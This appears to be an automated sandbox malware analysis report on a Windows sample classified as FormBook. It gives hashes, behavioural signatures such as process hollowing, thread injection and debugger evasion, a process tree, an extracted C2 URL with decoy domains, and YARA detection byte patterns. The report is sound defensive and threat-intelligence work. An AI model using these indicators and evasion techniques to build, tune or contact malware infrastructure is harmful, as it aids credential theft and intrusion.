Edit tour

Windows Analysis Report
Swift.exe

Overview

General Information

Sample Name:	Swift.exe
Analysis ID:	751599
MD5:	0202c53a04751949b148ac5eab59030e
SHA1:	32febcf0ec3e26a2852a677a1e0f80a520844ee4
SHA256:	ad6df53019d5d8930fce4ad4a7e0d15a08d9771b3cff97b7c06bf3df364c17a4
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

Swift.exe (PID: 4836 cmdline: C:\Users\user\Desktop\Swift.exe MD5: 0202C53A04751949B148AC5EAB59030E)

idxgunu.exe (PID: 1980 cmdline: "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx MD5: 8748279BD1A60B520E0F062016B094E8)

conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

idxgunu.exe (PID: 4620 cmdline: "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx MD5: 8748279BD1A60B520E0F062016B094E8)

explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 3216 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 1668 cmdline: /c del "C:\Users\user\AppData\Local\Temp\idxgunu.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cdlcapitolsolutions.com/b31b/"], "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com", "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com", "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top", "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com", "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com", "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours", "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online", "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com", "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro", "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info", "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site", "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com", "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9bc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5849:$sqlite3step: 68 34 1C 7B E1 0x595c:$sqlite3step: 68 34 1C 7B E1 0x5878:$sqlite3text: 68 38 2A 90 C5 0x599d:$sqlite3text: 68 38 2A 90 C5 0x588b:$sqlite3blob: 68 53 D8 7F 8C 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9bc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x28b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5849:$sqlite3step: 68 34 1C 7B E1 0x595c:$sqlite3step: 68 34 1C 7B E1 0x5878:$sqlite3text: 68 38 2A 90 C5 0x599d:$sqlite3text: 68 38 2A 90 C5 0x588b:$sqlite3blob: 68 53 D8 7F 8C 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: idxgunu.exe PID: 1980	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x95d7b:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: idxgunu.exe PID: 4620	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x188:$a1: 3C 30 50 4F 53 54 74 09 40 0xe96c8:$a1: 3C 30 50 4F 53 54 74 09 40 0x1822a7:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 3216	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x11d1f1:$a1: 3C 30 50 4F 53 54 74 09 40 0x14775c:$a1: 3C 30 50 4F 53 54 74 09 40 0x185366:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.idxgunu.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.idxgunu.exe.400000.5.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.0.idxgunu.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.idxgunu.exe.400000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
3.2.idxgunu.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.idxgunu.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
